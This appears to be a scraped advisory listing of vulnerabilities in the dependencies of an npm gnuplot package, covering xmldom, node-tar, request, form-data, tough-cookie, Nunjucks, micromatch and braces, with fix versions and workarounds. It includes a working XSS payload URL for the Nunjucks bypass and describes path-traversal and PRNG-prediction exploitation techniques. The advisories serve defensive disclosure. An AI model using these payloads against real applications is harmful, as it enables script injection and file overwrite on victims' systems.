All the vulnerabilities related to the version 2.0.0 of the package
Uncontrolled Resource Consumption in trim-newlines
@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
Misinterpretation of malicious XML input
xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.
Update to one of the fixed versions of @xmldom/xmldom (>=0.7.0)
See issue #271 for the status of publishing xmldom to npm or join #270 for Q&A/discussion until it's resolved.
Downstream applications can validate the input and reject the maliciously crafted documents.
Similar to this one reported on the Go standard library:
If you have any questions or comments about this advisory:
xmldom/xmldomnpm owner ls @xmldom/xmldomxmldom allows multiple root nodes in a DOM
xmldom parses XML that is not well-formed because it contains multiple top level elements, and adds all root nodes to the childNodes collection of the Document, without reporting any error or throwing.
This breaks the assumption that there is only a single root node in the tree, which led to https://nvd.nist.gov/vuln/detail/CVE-2022-39299 and is a potential issue for dependents.
Update to @xmldom/xmldom@~0.7.7, @xmldom/xmldom@~0.8.4 (dist-tag latest) or @xmldom/xmldom@>=0.9.0-beta.4 (dist-tag next).
One of the following approaches might help, depending on your use case:
documentElement.childNode.If you have any questions or comments about this advisory:
Misinterpretation of malicious XML input
xmldom versions 0.4.0 and older do not correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents.
This may lead to unexpected syntactic changes during XML processing in some downstream applications.
Update to 0.5.0 (once it is released)
Downstream applications can validate the input and reject the maliciously crafted documents.
Similar to this one reported on the Go standard library:
If you have any questions or comments about this advisory:
xmldom/xmldomnpm owner ls xmldomArbitrary File Creation/Overwrite due to insufficient absolute path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the preservePaths flag is not set to true. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example /home/user/.bashrc would turn into home/user/.bashrc.
This logic was insufficient when file paths contained repeated path roots such as ////home/user/.bashrc. node-tar would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. ///home/user/.bashrc) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite.
3.2.2 || 4.4.14 || 5.0.6 || 6.1.1
NOTE: an adjacent issue CVE-2021-32803 affects this release level. Please ensure you update to the latest patch levels that address CVE-2021-32803 as well if this adjacent issue affects your node-tar use case.
Users may work around this vulnerability without upgrading by creating a custom onentry method which sanitizes the entry.path or a filter method which removes entries with absolute paths.
const path = require('path')
const tar = require('tar')
tar.x({
file: 'archive.tgz',
// either add this function...
onentry: (entry) => {
if (path.isAbsolute(entry.path)) {
entry.path = sanitizeAbsolutePathSomehow(entry.path)
entry.absolute = path.resolve(entry.path)
}
},
// or this one
filter: (file, entry) => {
if (path.isAbsolute(entry.path)) {
return false
} else {
return true
}
}
})
Users are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain .. path portions, and resolving the sanitized paths against the extraction target directory.
This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as C:some\path. If the drive letter does not match the extraction target, for example D:\extraction\dir, then the result of path.resolve(extractionDirectory, entryPath) would resolve against the current working directory on the C: drive, rather than the extraction target directory.
Additionally, a .. portion of the path could occur immediately after the drive letter, such as C:../foo, and was not properly sanitized by the logic that checked for .. within the normalized and split portions of the path.
This only affects users of node-tar on Windows systems.
4.4.18 || 5.0.10 || 6.1.9
There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does.
Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.
The fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not "absolute".
Additionally, a path starting with a drive letter and then two dots, like c:../, would bypass the check for .. path portions. This is checked properly in the patched versions.
Finally, a defense in depth check is added, such that if the entry.absolute is outside of the extraction taret, and we are not in preservePaths:true mode, a warning is raised on that entry, and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development.
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar package I came across the folder creation process, Basicly if you provide node-tar with a path like this ./a/b/c/foo.txt it would create every folder and sub-folder here a, b and c until it reaches the last folder to create foo.txt, In-this case I noticed that there's no validation at all on the amount of folders being created, that said we're actually able to CPU and memory consume the system running node-tar and even crash the nodejs client within few seconds of running it using a path with too many sub-folders inside
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it, you should get the same behavior as the video
Here's a video show-casing the exploit:
Denial of service by crashing the nodejs client when attempting to parse a tar archive, make it run out of heap memory and consuming server CPU and memory resources
This report was originally reported to GitHub bug bounty program, they asked me to report it to you a month ago
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
form-data uses unsafe random function in form-data for choosing boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must:
form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
Nunjucks autoescape bypass leads to cross site scripting
In Nunjucks versions prior to version 3.2.4, it was possible to bypass the restrictions which are provided by the autoescape functionality. If there are two user-controlled parameters on the same line used in the views, it was possible to inject cross site scripting payloads using the backslash \ character.
If the user-controlled parameters were used in the views similar to the following:
<script>
let testObject = { lang: '{{ lang }}', place: '{{ place }}' };
</script>
It is possible to inject XSS payload using the below parameters:
https://<application-url>/?lang=jp\&place=};alert(document.domain)//
The issue was patched in version 3.2.4.
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
Regular Expression Denial of Service in braces
Versions of braces prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.
Upgrade to version 2.3.1 or higher.
Uncontrolled resource consumption in braces
The NPM package braces fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.